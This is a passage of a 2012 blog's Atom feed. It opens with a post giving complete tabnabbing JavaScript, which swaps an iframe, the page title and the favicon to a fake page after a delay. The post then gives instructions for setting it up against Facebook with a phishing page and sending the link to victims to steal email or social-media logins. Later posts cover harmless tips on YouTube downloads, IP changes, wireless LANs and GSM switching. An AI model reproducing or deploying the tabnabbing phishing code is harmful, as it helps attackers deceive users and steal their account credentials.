http://www.bdcyberarmy.tk&lt;br /&gt;Version:1.6&lt;br /&gt;--&amp;gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;html&amp;gt;&lt;br /&gt;&amp;lt;head&amp;gt;&amp;lt;title&amp;gt;&amp;lt;/title&amp;gt;&amp;lt;/head&amp;gt;&lt;br /&gt;&amp;lt;style type="text/css"&amp;gt;&lt;br /&gt;html {overflow: auto;}&lt;br /&gt;html, body, div, iframe {margin: 0px; padding: 0px; height: 100%; border: none;}&lt;br /&gt;iframe {display: block; width: 100%; border: none; overflow-y: auto; overflow-x: hidden;}&lt;br /&gt;&amp;lt;/style&amp;gt;&lt;br /&gt;&amp;lt;body&amp;gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;script type="text/javascript"&amp;gt;&lt;br /&gt;//----------Set Script Options--------------&lt;br /&gt;var REAL_PAGE_URL = "http://www.google.com/"; //This is the "Real" page that is shown when the user first views this page&lt;br /&gt;var REAL_PAGE_TITLE = "Google"; //This sets the title of the "Real Page"&lt;br /&gt;var FAKE_PAGE_URL = "http://www.hackingloops.com"; //Set this to the url of the fake page&lt;br /&gt;var FAKE_PAGE_TITLE = "HackingLoops| Next Generation Hackers Portal"; //This sets the title of the fake page&lt;br /&gt;var REAL_FAVICON = "http://www.google.com/favicon.ico"; //This sets the favicon.&amp;nbsp; It will not switch or clear the "Real" favicon in IE.&lt;br /&gt;var FAKE_FAVICON = "http://www.hackingloops.com/favicon.ico"; //Set's the fake favicon.&lt;br /&gt;var TIME_TO_SWITCH_IE = "4000"; //Time before switch in Internet Explorer (after tab changes to fake tab).&lt;br /&gt;var TIME_TO_SWITCH_OTHERS = "10000"; //Wait this long before switching .&lt;br /&gt;//---------------End Options-----------------&lt;br /&gt;var TIMER = null;&lt;br /&gt;var SWITCHED = "false";&lt;br /&gt;&lt;br /&gt;//Find Browser Type&lt;br /&gt;var BROWSER_TYPE = "";&lt;br /&gt;if(/MSIE (\d\.\d+);/.test(navigator.userAgent)){&lt;br /&gt;&amp;nbsp;BROWSER_TYPE = "Internet Explorer";&lt;br /&gt;}&lt;br /&gt;//Set REAL_PAGE_TITLE&lt;br /&gt;document.title=REAL_PAGE_TITLE;&lt;br /&gt;&lt;br /&gt;//Set FAVICON&lt;br /&gt;if(REAL_FAVICON){&lt;br /&gt;&amp;nbsp;var link = document.createElement('link');&lt;br /&gt;&amp;nbsp;link.type = 'image/x-icon';&lt;br /&gt;&amp;nbsp;link.rel = 'shortcut icon';&lt;br /&gt;&amp;nbsp;link.href = REAL_FAVICON;&lt;br /&gt;&amp;nbsp;document.getElementsByTagName('head')[0].appendChild(link);&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;//Create our iframe (tabnab)&lt;br /&gt;var el_tabnab = document.createElement("iframe");&lt;br /&gt;el_tabnab.id="tabnab";&lt;br /&gt;el_tabnab.name="tabnab";&lt;br /&gt;document.body.appendChild(el_tabnab);&lt;br /&gt;el_tabnab.setAttribute('src', REAL_PAGE_URL);&lt;br /&gt;&lt;br /&gt;//Focus on the iframe (just in case the user doesn't click on it)&lt;br /&gt;el_tabnab.focus();&lt;br /&gt;&lt;br /&gt;//Wait to nab the tab!&lt;br /&gt;if(BROWSER_TYPE=="Internet Explorer"){ //To unblur the tab changes in Internet Web browser&lt;br /&gt;&amp;nbsp;el_tabnab.onblur = function(){&lt;br /&gt;&amp;nbsp;TIMER = setTimeout(TabNabIt, TIME_TO_SWITCH_IE);&lt;br /&gt;&amp;nbsp;}&lt;br /&gt;&amp;nbsp;el_tabnab.onfocus= function(){&lt;br /&gt;&amp;nbsp;if(TIMER) clearTimeout(TIMER);&lt;br /&gt;&amp;nbsp;}&lt;br /&gt;} else {&lt;br /&gt;&amp;nbsp;setTimeout(TabNabIt, TIME_TO_SWITCH_OTHERS);&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;function TabNabIt(){&lt;br /&gt;&amp;nbsp;if(SWITCHED == "false"){&lt;br /&gt;&amp;nbsp;//Redirect the iframe to FAKE_PAGE_URL&lt;br /&gt;&amp;nbsp;el_tabnab.src=FAKE_PAGE_URL;&lt;br /&gt;&amp;nbsp;//Change title to FAKE_PAGE_TITLE and favicon to FAKE_PAGE_FAVICON&lt;br /&gt;&amp;nbsp;if(FAKE_PAGE_TITLE) document.title = FAKE_PAGE_TITLE;&lt;br /&gt;&lt;br /&gt;&amp;nbsp;//Change the favicon -- This doesn't seem to work in IE&lt;br /&gt;&amp;nbsp;if(BROWSER_TYPE != "Internet Explorer"){&lt;br /&gt;&amp;nbsp;var links = document.getElementsByTagName("head")[0].getElementsByTagName("link");&lt;br /&gt;&amp;nbsp;for (var i=0; i&amp;lt;links.length; i++) {&lt;br /&gt;&amp;nbsp;var looplink = links[i];&lt;br /&gt;&amp;nbsp;if (looplink.type=="image/x-icon" &amp;amp;&amp;amp; looplink.rel=="shortcut icon") {&lt;br /&gt;&amp;nbsp;document.getElementsByTagName("head")[0].removeChild(looplink);&lt;br /&gt;&amp;nbsp;}&lt;br /&gt;&amp;nbsp;}&lt;br /&gt;&amp;nbsp;var link = document.createElement("link");&lt;br /&gt;&amp;nbsp;link.type = "image/x-icon";&lt;br /&gt;&amp;nbsp;link.rel = "shortcut icon";&lt;br /&gt;&amp;nbsp;link.href = FAKE_FAVICON;&lt;br /&gt;&amp;nbsp;document.getElementsByTagName("head")[0].appendChild(link);&lt;br /&gt;&amp;nbsp;}&lt;br /&gt;&amp;nbsp;}&lt;br /&gt;}&lt;br /&gt;&amp;lt;/script&amp;gt;&lt;br /&gt;&lt;br /&gt;&amp;lt;/body&amp;gt;&lt;br /&gt;&amp;lt;/html&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Now what you need to replace in this code to make it working say for Facebook:&lt;br /&gt;1. REAL_PAGE_URL : &lt;span style="color: magenta;"&gt;www.facebook.com&lt;/span&gt;&lt;br /&gt;2. REAL_PAGE_TITLE : &lt;span style="color: magenta;"&gt;Welcome to Facebook - Log In, Sign Up or Learn More&lt;/span&gt;&lt;br /&gt;3. FAKE_PAGE_URL : &lt;span style="color: magenta;"&gt;Your Fake Page or Phish Page URL&lt;/span&gt;&lt;br /&gt;4. FAKE_PAGE_TITLE : &lt;span style="color: magenta;"&gt;Welcome to Facebook - Log In, Sign Up or Learn More&lt;/span&gt;&lt;br /&gt;5. REAL_FAVICON : &lt;span style="color: magenta;"&gt;www.facebook.com/favicon.ico&lt;/span&gt;&lt;br /&gt;6. FAKE_FAVICON : &lt;span style="color: magenta;"&gt;Your Fake Page URL/favicon.ico &lt;/span&gt;( Note: Its better to upload the facebook favicon, it will make it more undetectable)&lt;br /&gt;7. BROWSER_TYPE : Find which web browser normally user uses and put that name here in quotes.&lt;br /&gt;8. TIME_TO_SWITCH_IE : Put numeric value (time) after you want tab to switch.&lt;br /&gt;9. TIME_TO_SWITCH_OTHERS : Time after which you want to switch back to original 'real' page or some other Page.&lt;br /&gt;&lt;br /&gt;Now as i have explained earlier you can use this technique to hack anything like email accounts, Facebook or any other social networking website. What you need to do is that just edit the above mentioned 9 fields and save it as anything.htm and upload it any free web hosting website along with favicon file and send the link to user in form of email or chat message ( hidden using href keyword in html or spoofed using some other technique).&lt;br /&gt;&lt;br /&gt;That's all for today. I hope you all enjoyed some advanced stuff. If you have any doubts or queries ask me in form of comments.&lt;br /&gt;A comment of appreciation will do the work..&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;You can Also See My Older post&lt;/b&gt;&lt;/span&gt; &lt;span style="color: magenta;"&gt;&lt;a href="http://widget5.linkwithin.com/redirect?url=http%3A//made-by-bangladesh.blogspot.com/2012/09/facebook-hackinghotmail-hackinggmail.html&amp;amp;vars=%5B%22http%3A//made-by-bangladesh.blogspot.com/%22%2C%201496039%2C%208%2C%20%22http%3A//made-by-bangladesh.blogspot.com/2012/10/more-about-of-mobile-stationms.html%22%2C%20258556359%2C%200%2C%20258556413%5D&amp;amp;ts=1350196942791" target="_blank"&gt;Fishing Technique &lt;/a&gt;&amp;nbsp; &lt;/span&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://made-by-bangladesh.blogspot.com/feeds/730174887087099073/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=921095381650575288&amp;postID=730174887087099073&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/921095381650575288/posts/default/730174887087099073?v=2'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/921095381650575288/posts/default/730174887087099073?v=2'/><link rel='alternate' type='text/html' href='http://made-by-bangladesh.blogspot.com/2012/10/the-advance-hacking-tabnabbing.html' title='The Advance Hacking TabNabbing !'/><author><name>Sajal Mondal</name><uri>https://plus.google.com/110516349656262710148</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh6.googleusercontent.com/-PWKcdujUFv8/AAAAAAAAAAI/AAAAAAAAASY/dzhIK6bFxxY/s512-c/photo.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/-_lEdWed8aJY/UHpjk10GDoI/AAAAAAAAALs/d1m549U0xoc/s72-c/Advance-Tabnabbing-2012.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry gd:etag='W/&quot;D0AGSHwyfSp7ImA9WhNTEUQ.&quot;'><id>tag:blogger.com,1999:blog-921095381650575288.post-6312971149268759714</id><published>2012-10-14T12:22:00.000+06:00</published><updated>2012-10-14T12:22:09.295+06:00</updated><app:edited xmlns:app='http://www.w3.org/2007/app'>2012-10-14T12:22:09.295+06:00</app:edited><category scheme='http://www.blogger.com/atom/ns#' term='Internet'/><title>Download youtube videos without any software</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://encrypted-tbn2.gstatic.com/images?q=tbn:ANd9GcR4wbR5XVhhr3YGinmNnt2wN-BMeEHLwqEkKaTLJ84yIAA205AEc0bajK0k" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://encrypted-tbn2.gstatic.com/images?q=tbn:ANd9GcR4wbR5XVhhr3YGinmNnt2wN-BMeEHLwqEkKaTLJ84yIAA205AEc0bajK0k" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;This is simple trick which will allow you to download youtube videos without any software and in different formats such as mpeg4, 3gp, hd and many more.&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; First Go to Youtube webpage.&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Then go to video you want to download.&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Example :&amp;nbsp; &lt;span style="color: magenta;"&gt;http://www.youtube.com/watch?v=_JAa3NvP6f4&lt;/span&gt;&lt;br /&gt;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;Now add save before youtube and press enter.&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Example :&amp;nbsp; &lt;span style="color: magenta;"&gt;http://www.saveyoutube.com/watch?v=_JAa3NvP6f4&lt;/span&gt;&lt;br /&gt;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;Now you will be redirected to a new page from where you can download video in any format of your choice&lt;br /&gt;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;NOTE: In place of save you can also use kick&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://made-by-bangladesh.blogspot.com/feeds/6312971149268759714/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=921095381650575288&amp;postID=6312971149268759714&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/921095381650575288/posts/default/6312971149268759714?v=2'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/921095381650575288/posts/default/6312971149268759714?v=2'/><link rel='alternate' type='text/html' href='http://made-by-bangladesh.blogspot.com/2012/10/download-youtube-videos-without-any.html' title='Download youtube videos without any software'/><author><name>Sajal Mondal</name><uri>https://plus.google.com/110516349656262710148</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh6.googleusercontent.com/-PWKcdujUFv8/AAAAAAAAAAI/AAAAAAAAASY/dzhIK6bFxxY/s512-c/photo.jpg'/></author><thr:total>0</thr:total></entry><entry gd:etag='W/&quot;DEAGRXg-eSp7ImA9WhNTEU8.&quot;'><id>tag:blogger.com,1999:blog-921095381650575288.post-5418013863782567628</id><published>2012-10-13T16:55:00.000+06:00</published><updated>2012-10-13T17:12:04.651+06:00</updated><app:edited xmlns:app='http://www.w3.org/2007/app'>2012-10-13T17:12:04.651+06:00</app:edited><category scheme='http://www.blogger.com/atom/ns#' term='Windows computer tips'/><category scheme='http://www.blogger.com/atom/ns#' term='PC Tips'/><category scheme='http://www.blogger.com/atom/ns#' term='Internet'/><title>Change your IP Address Manually Easylly !</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;Hello&amp;nbsp; Visitor, &lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-XtSzfo55BCE/UHlHb1Cqd6I/AAAAAAAAALM/nNGIaH23i0Q/s1600/ip.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/-XtSzfo55BCE/UHlHb1Cqd6I/AAAAAAAAALM/nNGIaH23i0Q/s1600/ip.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Today i'll Explain How to change your &lt;b&gt;Internet Protocol address&lt;/b&gt; (&lt;b&gt;IP address&lt;/b&gt;) By a simple Method.In my Next post i'll&amp;nbsp; show you how to Grab someone ip address now i will show you how to change ip address in less then a minute. For now it will take Few minutes but with some practice you can do this within a minute.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Click on "&lt;span style="color: magenta;"&gt;Start&lt;/span&gt;" in the bottom left corner of the screen.&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Click on "&lt;span style="color: magenta;"&gt;RUN&lt;/span&gt;"&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Type in "&lt;span style="color: magenta;"&gt;command&lt;/span&gt;" and press Enter&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; You should be now at MSDOS prompt Screen&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Type "&lt;span style="color: magenta;"&gt;ipconfig /release&lt;/span&gt;" just like that, and press "Enter"&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Type "&lt;span style="color: magenta;"&gt;exit&lt;/span&gt;" and leave the prompt&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Right-click on "&lt;span style="color: magenta;"&gt;Network Places&lt;/span&gt;" or "&lt;span style="color: magenta;"&gt;My Network Places&lt;/span&gt;" on your desktop.&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Click on "&lt;span style="color: magenta;"&gt;properties&lt;/span&gt;"&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Now you should&amp;nbsp; be on a screen with something titled "&lt;span style="color: magenta;"&gt;Local Area Connection&lt;/span&gt;", or something&amp;nbsp; similar to that, and, if you have a network hooked up, all of your other networks.&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Right click on "&lt;span style="color: magenta;"&gt;Local Area Connection&lt;/span&gt;" and click "&lt;span style="color: magenta;"&gt;properties&lt;/span&gt;"&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Double-click on the "&lt;span style="color: magenta;"&gt;Internet Protocol (TCP/IP)&lt;/span&gt;" from the list under the "&lt;span style="color: magenta;"&gt;General&lt;/span&gt;" tab&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Click on "&lt;span style="color: magenta;"&gt;Use the following IP address&lt;/span&gt;" under the "&lt;span style="color: magenta;"&gt;General&lt;/span&gt;" tab&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Create an IP address (It doesn't matter what it is)&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Press "&lt;span style="color: magenta;"&gt;Tab&lt;/span&gt;" and it should automatically fill in the "&lt;span style="color: magenta;"&gt;Subnet Mask&lt;/span&gt;" section with default numbers.&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Press the "&lt;span style="color: magenta;"&gt;Ok&lt;/span&gt;" button here&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Hit the "&lt;span style="color: magenta;"&gt;Ok&lt;/span&gt;" button again&lt;br /&gt;&lt;span id="goog_868782119"&gt;&lt;/span&gt;&lt;span id="goog_868782120"&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Now you should be back to the "&lt;span style="color: magenta;"&gt;Local Area Connection&lt;/span&gt;" screen.&lt;br /&gt;&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Right-click back on "&lt;span style="color: magenta;"&gt;Local Area Connection&lt;/span&gt;" and go to properties again.&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Go back to the "&lt;span style="color: magenta;"&gt;TCP/IP&lt;/span&gt;" settings&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; This time, select "&lt;span style="color: magenta;"&gt;Obtain an IP address automatically&lt;/span&gt;"&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Click on "&lt;span style="color: magenta;"&gt;Ok&lt;/span&gt;"&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Hit "&lt;span style="color: magenta;"&gt;Ok&lt;/span&gt;" again.&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Now you have got a New IP address.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://made-by-bangladesh.blogspot.com/feeds/5418013863782567628/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=921095381650575288&amp;postID=5418013863782567628&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/921095381650575288/posts/default/5418013863782567628?v=2'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/921095381650575288/posts/default/5418013863782567628?v=2'/><link rel='alternate' type='text/html' href='http://made-by-bangladesh.blogspot.com/2012/10/change-your-ip-address-manually-easylly.html' title='Change your IP Address Manually Easylly !'/><author><name>Sajal Mondal</name><uri>https://plus.google.com/110516349656262710148</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh6.googleusercontent.com/-PWKcdujUFv8/AAAAAAAAAAI/AAAAAAAAASY/dzhIK6bFxxY/s512-c/photo.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/-XtSzfo55BCE/UHlHb1Cqd6I/AAAAAAAAALM/nNGIaH23i0Q/s72-c/ip.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry gd:etag='W/&quot;AkYHSXs-eyp7ImA9WhJaFEk.&quot;'><id>tag:blogger.com,1999:blog-921095381650575288.post-4444097861396945063</id><published>2012-10-05T20:42:00.002+06:00</published><updated>2012-10-05T20:42:18.553+06:00</updated><app:edited xmlns:app='http://www.w3.org/2007/app'>2012-10-05T20:42:18.553+06:00</app:edited><category scheme='http://www.blogger.com/atom/ns#' term='TeleCommunication'/><title> Wireless Lan Networking Introduction !</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;strong&gt;&lt;span style="color: #cc0000;"&gt;Introduction:&lt;/span&gt; &lt;span style="color: #38761d;"&gt;Wireless
 technology has helped to simplify networking by enabling multiple 
computer users to simultaneously share resources in a home or business 
without additional or intrusive wiring. These resources might include a 
broadband Internet connection, network printers, data files, and even 
streaming audio and video. This kind of resource sharing has become more
 prevalent as computer users have changed their habits from using 
single, stand-alone computers to working on networks with multiple 
computers, each with potentially different operating systems and varying
 peripheral hardware. U.S. Robotics wireless networking products offer a
 variety of solutions to seamlessly integrate computers, peripherals, 
and data. Wireless networking enables the same capabilities and 
comparable speeds of a wired 10BASE-T network without the difficulties 
associated with laying wire, drilling into walls, or stringing Ethernet 
cables throughout an office building or home. Laptop users have the 
freedom to roam anywhere in the office building or home without having 
to hunt down a connector cable or available jack. Every room in a 
wireless home or office can be “connected” to the network, so adding 
more users and growing a network can be as simple as installing a new 
wireless network adapter. Reasons to choose wireless networking over 
traditional wired networks include: · Running additional wires or 
drilling new holes in a home or office could be prohibited (because of 
rental regulations), impractical (infrastructure limitations), or too 
expensive · Flexibility of location and data ports is required · Roaming
 capability is desired; e.g., maintaining connectivity from almost 
anywhere inside a home or business · Network access is desired outdoors;
 e.g., outside a home or office building.&lt;/span&gt;&lt;/strong&gt;
&lt;br /&gt;
&lt;div class="wp-caption alignleft" id="attachment_620" style="width: 360px;"&gt;
&lt;img alt="Wireless Lan" class="size-medium wp-image-620" height="186" src="http://gsmbts.files.wordpress.com/2012/03/lan.jpg?w=350&amp;amp;h=186" title="Wireless Lan" width="350" /&gt;&lt;div class="wp-caption-text"&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;Wireless Lan&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;span style="color: #38761d;"&gt;&lt;strong&gt;&lt;strong&gt;&lt;span style="color: #cc0000;"&gt;Wireless LANs in the&amp;nbsp;Office:&lt;/span&gt;&amp;nbsp; &lt;/strong&gt;An
 802.11 network is the ideal solution for a network administrator in 
many respects. No longer is it a requirement that every workstation and 
conference room be wired up to hubs and switches with cables in 
hard-to-reach areas. Wireless networking allows for impromptu meetings 
in cafeterias, hallways, courtyards, or wherever inspiration strikes 
while providing real-time LAN connectivity for business applications 
such as sending e-mail, working on spreadsheets on shared drives, and 
conducting market research.&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;

&lt;span style="color: #38761d;"&gt;&lt;strong&gt;&lt;span style="color: #cc0000;"&gt;Wireless LANs in &lt;/span&gt;&lt;strong&gt;&lt;span style="color: #cc0000;"&gt;Home:&lt;/span&gt; &lt;/strong&gt;The
 Wireless networking has become commonplace, and with prices reduced to a
 fraction of what they were, it is no wonder that wireless networking 
products have transitioned from the office and into the home. For the 
home user, a wireless network provides freedom in convenience and 
lifestyle to exchange words, data, and music or video with any computer ­
 across the Internet, or around the world. Home users can create a 
wireless network out of an existing wired network and wirelessly extend 
the reach of the Internet throughout the home on multiple computers, 
making it more convenient for everyone to get online.&lt;/strong&gt;&lt;/span&gt;&lt;/div&gt;
</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/921095381650575288/posts/default/4444097861396945063?v=2'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/921095381650575288/posts/default/4444097861396945063?v=2'/><link rel='alternate' type='text/html' href='http://made-by-bangladesh.blogspot.com/2012/10/wireless-lan-networking-introduction.html' title=' Wireless Lan Networking Introduction !'/><author><name>Sajal Mondal</name><uri>https://plus.google.com/110516349656262710148</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh6.googleusercontent.com/-PWKcdujUFv8/AAAAAAAAAAI/AAAAAAAAASY/dzhIK6bFxxY/s512-c/photo.jpg'/></author></entry><entry gd:etag='W/&quot;DU4BQH49fip7ImA9WhJaFEk.&quot;'><id>tag:blogger.com,1999:blog-921095381650575288.post-1827167516375125056</id><published>2012-10-05T20:38:00.003+06:00</published><updated>2012-10-05T20:39:11.066+06:00</updated><app:edited xmlns:app='http://www.w3.org/2007/app'>2012-10-05T20:39:11.066+06:00</app:edited><category scheme='http://www.blogger.com/atom/ns#' term='TeleCommunication'/><title>Mobile Switching Center(MSC)</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;header class="entry-header"&gt;
    &lt;h1 class="entry-title"&gt;
&lt;span style="color: #cc0000;"&gt;Mobile Switching&amp;nbsp;Center(MSC)&lt;/span&gt;&lt;/h1&gt;
&lt;/header&gt;

 
  &lt;a href="http://gsmbts.files.wordpress.com/2012/01/mobile-switching-center.jpg"&gt;&lt;img alt="" class="alignleft size-medium wp-image-36" height="225" src="http://gsmbts.files.wordpress.com/2012/01/mobile-switching-center.jpg?w=300&amp;amp;h=225" title="mobile-switching-center-" width="300" /&gt;&lt;/a&gt;&lt;span style="color: #38761d;"&gt;&lt;b&gt;&lt;del&gt;Mobile&amp;nbsp; Switching&amp;nbsp; Center:&lt;/del&gt;:The
 MSC is the heart of the GSM network. It handles call routing, call 
setup, and basic switching functions. An MSC handles multiple BSCs and 
also interfaces with other MSC’s and registers. It also handles 
inter-BSC handoffs as well as coordinates with other MSC’s for inter-MSC
 handoffs.&lt;br /&gt;
The Mobile Switching Centre Server, or MSC Server abbreviated MSS, is a 
3G core network element which controls the network switching subsystem 
elements. Alternatively or adaptively, MSS can be used in GSM networks 
as well, if the manufacturer has implemented support for GSM networks in
 the MSS. Since an immediate upgrade of existing GSM network to 3G is 
not viable due to various issues like handset incompatibilities and high
 expenditure, most manufacturers do implement GSM support in MSS. In 
fact, MSS along with other 3G network elements such as media gateway 
(MGW), can be configured to support GSM network exclusively and can be 
considered as an upgraded version of existing GSM mobile switching 
Centres. The MSC Server is standards-based and communicates with other 
distributed elements using industry open standards such as media gateway
 control protocol, megaco/H.248, session initiation protocol, M2UA and 
M3UA. The MSC server incorporates industry standards as defined by ETSI,
 ITU, GSM, 3GPP and 3GPP2 and other leading standard bodies. The MSS 
supports the regulatory environment set by governing bodies via its 
support for E911, CALEA/legal intercept, wireless and local number 
portability, TTY/TTD, and Number Pooling requirements.&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;Alternatively MSS is also called an MTS-U (Motorola telephony 
soft-switch) in Motorola terminology, and as MSC-S in Ericsson 
terminology. MSC server functionality enables split between control 
(signalling) and user plane (bearer in network element called a media 
gateway), which guarantees better placement of network elements within 
the network.&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;MSC server and MGW makes it possible to cross-connect circuit switched calls switched by using IP, ATM AAL2 as well as TDM.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/921095381650575288/posts/default/1827167516375125056?v=2'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/921095381650575288/posts/default/1827167516375125056?v=2'/><link rel='alternate' type='text/html' href='http://made-by-bangladesh.blogspot.com/2012/10/mobile-switching-centermsc.html' title='Mobile Switching Center(MSC)'/><author><name>Sajal Mondal</name><uri>https://plus.google.com/110516349656262710148</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh6.googleusercontent.com/-PWKcdujUFv8/AAAAAAAAAAI/AAAAAAAAASY/dzhIK6bFxxY/s512-c/photo.jpg'/></author></entry></feed>